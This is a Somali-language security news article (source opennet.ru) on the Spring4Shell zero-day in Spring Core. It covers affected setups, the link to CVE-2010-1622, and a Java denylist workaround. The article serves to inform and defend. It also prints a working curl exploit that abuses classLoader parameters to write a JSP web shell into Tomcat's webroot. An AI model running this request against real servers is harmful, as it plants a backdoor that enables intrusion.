Nuglaansho halis ah oo aan maalin lahayn ayaa laga helay module-ka Spring Core, kaas oo qayb ka ah Qaab-dhismeedka Gu'ga. Nuglaanshadani waxay u oggolaanaysaa weeraryahan fog oo aan la xaqiijin inuu ku fuliyo koodka server-ka. Ma cadda sida ay u noqon doonto masiibo saameynta arrintani, ama in weerarradu ay u baahsanaan doonaan sida kuwa lagu arkay nuglaanta Log4j 2. Nuglaanta waxaa loogu magac daray Spring4Shell, laakiin aqoonsi CVE weli lama qoondayn. Arrinta weli lama hagaajin Qaab-dhismeedka Gu'ga, dhowr nooc oo ka faa'iidaysi shaqo ahna horey ayaa looga heli karaa khadka tooska ah (1, 2, 3, 4). Dhibaatada waxaa sii xumeeyay xaqiiqda ah in codsiyo badan oo Java ganacsi oo ku salaysan Qaab-dhismeedka Gu'ga ay la socdaan mudnaanta xididka, taasoo u oggolaanaysa nuglaanta inay si buuxda u wiiqo nidaamka.
Sida laga soo xigtay qiyaaso qaar, module-ka Spring Core waxaa loo isticmaalaa 74% codsiyada Java. Darnaanta nuglaanta waxaa yareeya xaqiiqda ah inay saameyn ku yeelato oo keliya codsiyada isticmaala qoraalka "@RequestMapping" marka ay ku dhejinayaan maamulayaasha codsiga iyo xuduudaha foomka shabakadda ee qaabka "name=value" (POJO, Plain Old Java Object), halkii ay ka isticmaali lahaayeen JSON/XML.
Wali ma cadda codsiyada iyo qaab-dhismeedka Java ee ay arrintani saamaysay. Nuglaantu waxay ka hortagaysaa in liiska madow lagu daro goobaha "class," "module," iyo "classLoader", ama isticmaalka liis cad oo cad oo ah meelaha la oggol yahay. Ka faa'iidaysiga waxaa suurtagal ah oo keliya Java/JDK 9 ama ka dib. Arrinta waxaa sababa marin-habaabin suurtagal ah oo CVE-2010-1622 ah, oo ah nuglaansho lagu hagaajiyay Qaab-dhismeedka Gu'ga sannadkii 2010 kaas oo ku lug leh fulinta maamulaha classLoader marka la falanqeynayo xuduudaha codsiga.
Faa'iidada waxay ku shaqeysaa iyadoo direysa codsi leh xuduudaha "class.module.classLoader.resources.context.parent.pipeline.first.*." Habaynta xuduudahan waxay abuurtaa fayl JSP ah oo ku jira deegaanka xididka Apache Tomcat waxayna ku qortaa koodka gaarka ah ee weeraryahanku faylkan. Faylka la abuuray wuxuu noqonayaa mid loo heli karo codsiyada tooska ah waxaana loo isticmaali karaa qolof shabakadeed. Si aad u weerarto codsi nugul oo ku jira deegaanka Apache Tomcat, si fudud u dir codsi leh xuduudo gaar ah adoo isticmaalaya qalabka curl. curl -v -d "class.module.classLoader.resources.context.parent.pipeline .first.pattern=code_to_insert_into_file &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-SNAPSHOT/rapid7
Arrintan ku jirta Spring Core waa in aan lagu khaldin nuglaanta dhawaan la ogaaday ee CVE-2022-22963 iyo CVE-2022-22950. Arrinta koowaad waxay saamaysaa xirmada Spring Cloud waxaana lagu xalliyay sii deynta 3.1.7 iyo 3.2.3. Arrinta labaad waxay saamaysaa Muujinta Guga waxaana lagu xalliyay Qaab-dhismeedka Guga 5.3.17. Kuwani waa nuglaanta aasaasiga ah ee kala duwan. Horumariyayaasha Qaab-dhismeedka Guga weli ma aysan sameyn wax hadal ah oo ku saabsan nuglaanta cusub ama ma aysan daabicin hagaajin.
Tallaabo amni oo ku meel gaar ah, waxaa lagu talinayaa in la isticmaalo liis madow oo ah xuduudaha codsiga aan sax ahayn ee koodhka: import org.springframework.core.Ordered; import org.springframework.core.annotation.Order; import org.springframework.web.bind.WebDataBinder; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.bind.annotation.InitBinder; @ControllerAdvice @Order(10000) public class BinderControllerAdvice { @InitBinder public void setAllowedFields(WebDataBinder dataBinder) { String[] denylist = new String[]{"class.", "Class.", ".class.", ".Class."}; dataBinder.setDisallowedFields(denylist); } }
Source: opennet.ru
